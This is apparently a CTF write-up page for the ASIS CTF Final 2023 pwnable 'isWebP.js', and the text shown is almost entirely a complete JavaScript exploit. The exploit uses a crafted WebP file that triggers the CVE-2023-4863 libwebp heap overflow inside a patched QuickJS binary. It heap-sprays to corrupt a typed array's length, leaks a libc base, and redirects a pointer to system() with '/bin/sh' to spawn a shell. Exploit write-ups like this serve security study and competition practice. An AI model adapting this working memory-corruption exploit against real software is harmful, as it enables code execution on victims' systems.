[CTF Write Up] ASIS CTF Final 2023 - isWebP.js : Exploiting QuickJS via a WebP Vulnerability
2024. 1. 6. 04:01ㆍCTF write up
1. Overview
2. CVE-2023-4863
3. Patch Analysis
3-1. libwebp.patch
3-2. quickjs.patch
3-2-1. Disable System Module
3-2-2. Add isWebP Function
4. Exploiting QuickJS
4-1. VP8LHuffmanTablesAllocate Analysis
4-2. Make OOB Read / Write Primitive by Heap Spraying
4-3. Hijack RIP
5. Finish
Full Write Up
isWebP.js는 ASIS CTF Final 2023에 출제된 Pwnable 문제입니다. CVE-2023-4863 취약점의 영향을 받는 버전의 libwebp 라이브러리와, WebP 관련 기능(isWebP 함수)이 추가된 QuickJS 바이너리가 주어집니다.
// CVE-2023-4863 trigger image, fed to the patched QuickJS's isWebP() (section 3-2-2).
// Container layout readable from the leading bytes: "RIFF" (82 73 70 70), little-endian
// RIFF size 0x288, "WEBP" (87 69 66 80), "VP8L" (86 80 56 76), little-endian chunk size
// 0x27b, then 0x2f (the VP8L signature byte). The rest is the lossless bitstream; per
// sections 2 and 4-1 its Huffman code lengths are crafted so the decoder's table
// allocation is smaller than what the table-building step then writes (heap overflow).
// NOTE(review): treat this literal as opaque binary. Re-typing, reformatting or
// "cleaning up" any byte changes what the decoder does and silently breaks the overflow.
let webp0 = new Uint8Array([82, 73, 70, 70, 136, 2, 0, 0, 87, 69, 66, 80, 86, 80, 56, 76, 123, 2, 0, 0, 47, 0, 0, 0, 16, 26, 15, 130, 36, 9, 146, 36, 73, 18, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 86, 207, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 221, 157, 7, 65, 146, 4, 73, 146, 36, 9, 48, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 50, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 179, 122, 118, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 247, 206, 131, 32, 73, 130, 36, 73, 146, 4, 24, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 89, 61, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 
187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 123, 231, 65, 144, 36, 65, 146, 36, 73, 2, 140, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 172, 158, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 189, 243, 32, 72, 146, 32, 73, 146, 36, 185, 187, 187, 187, 187, 187, 187, 71, 68, 68, 68, 68, 68, 68, 68, 68, 86, 207, 222, 221, 1, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255])
// Heap spray (section 4-2). Each iteration allocates one 0x2f28-byte ArrayBuffer and one
// Uint32Array(1) back to back; the interleaving is deliberate so that (presumably) every
// large buffer ends up next to a typed-array object on the heap.
// NOTE(review): layout-sensitive — do not reorder, merge, or "clean up" these loops; the
// exact allocation order is what makes the overflow below land on a Uint32Array header.
var spraying1 = new Array(0x500);
var spraying2 = new Array(0x500);
for(let i=0;i<0x500;i++){
spraying1[i] = new ArrayBuffer(0x2f28)
spraying2[i] = new Uint32Array(0x1)
}
// Drop the references to the large buffers at indices 1..0x4fe. Indices 0 and 0x4ff are
// kept, presumably as guards so the freed region is bounded on both sides. This assumes
// the runtime releases them right away (refcounting) so their slots become free holes.
for(let i=0x1;i<0x4ff;i++){
spraying1[i] = 0x0
}
// Decode the malicious WebP once per freed hole (0x4fe calls, matching the loop above).
// The decoder's undersized Huffman-table allocation (section 4-1) is expected to reclaim
// a hole and overflow into the neighbouring Uint32Array, clobbering its length field —
// that corrupted length is what the scan below looks for.
for(let i=0x1;i<0x4ff;i++){
isWebP(webp0)
}
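// Locate the Uint32Array whose length the overflow clobbered. Every spraying2 entry was
// created as Uint32Array(1), so any length above 0x100 can only be the corrupted header.
let oob_index = -1;
// Bound the scan by the spray size: the original 0xfff bound walked past the end of
// spraying2 and died on `undefined.length` whenever the spray missed.
for (let i = 0; i < spraying2.length; i++) {
  if (spraying2[i].length > 0x100) {
    oob_index = i;
    break;
  }
}
if (oob_index < 0) {
  // No victim found: stop here instead of driving the OOB writes below through a healthy
  // 1-element array (its out-of-range stores are silently dropped, so the failure would
  // only surface later as a confusing crash).
  throw new Error("[-] heap spray missed: no corrupted Uint32Array found");
}
console.log(`[+] OOB Index : ${oob_index}`);
// The corrupted array is the OOB read/write primitive used by the rest of the exploit.
// Declared explicitly rather than as an implicit global.
const OOBArray = spraying2[oob_index];
OOBArray[0] = 0xdead1337; // marker write; replaced by "/bin/sh" further down
console.log(`[+] OOBArray.length : ${OOBArray.length}`);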
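// Leak a libc address through the corrupted array (section 4-2). The qword at +0x81e90
// from the array's data is read as two 32-bit halves; subtracting 0x219ce0 from the low
// half rebases it to libc. The constant is the leaked pointer's offset inside libc —
// presumably a main_arena pointer left behind by a freed chunk — and is tied to the
// glibc build the challenge shipped.
const LEAK_OFFSET = 0x81e90 / 4;
if (!(OOBArray.length > LEAK_OFFSET + 1)) {
  // A typed-array read past .length silently yields undefined, which would turn the
  // "leak" into NaN; fail loudly instead.
  throw new Error(`[-] corrupted length 0x${OOBArray.length.toString(16)} does not reach the leak offset`);
}
let libc_base_lower = OOBArray[LEAK_OFFSET] - 0x219ce0;
let libc_base_higher = OOBArray[LEAK_OFFSET + 1];
// Two-dword subtraction: propagate the borrow into the upper half when the low dword of
// the leaked pointer is smaller than 0x219ce0 (rare, but otherwise the base is off by 2^32).
if (libc_base_lower < 0) {
  libc_base_lower += 0x100000000;
  libc_base_higher -= 1;
}
// Zero-pad the low dword; without it a low half with leading zeros prints a shifted address.
console.log(`[+] libc_base : 0x${libc_base_higher.toString(16)}${libc_base_lower.toString(16).padStart(8, "0")}`);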
// Payload and trigger (section 4-3). `binsh` is a plain Array, not a Uint8Array like
// webp0: presumably isWebP's handling of a non-typed-array argument is the path that
// reaches the hijacked pointer below — TODO confirm against the patched binary.
let binsh = [0xdeadbeef]
// Rewrite the low dword of a pointer that sits 0x58 bytes past the corrupted array's data
// so it points 0x121d48 + 0x2ebb8 bytes lower. Only the low 32 bits are touched, so this
// assumes the subtraction does not borrow into the upper dword; both constants are
// specific to this heap layout / binary.
OOBArray[0x58/4] = OOBArray[0x58/4] - 0x121d48 - 0x2ebb8
// "/bin/sh\0" written little-endian at the start of the array's data, presumably so the
// data pointer itself can serve as the string argument of the planted call.
OOBArray[0] = 0x6e69622f
OOBArray[1] = 0x68732f
// Plant libc_base + 0x50d70 as low/high dwords at +0x2ebb8 (0x50d70 is presumably
// system() in the target glibc). The high dword is stored without a carry from the
// low-dword addition; that only matters if libc_base_lower + 0x50d70 crosses 2^32.
OOBArray[0x2ebb8 / 4] = libc_base_lower + 0x50d70
OOBArray[(0x2ebb8 / 4) + 1] = libc_base_higher
// Trigger: this call is expected to go through the redirected pointer and land on the
// planted function with the "/bin/sh" data as its argument.
isWebP(binsh)
console.log("pause")
while(true){} // keep the process alive; presumably avoids the interpreter's shutdown path walking the corrupted heap — TODO confirm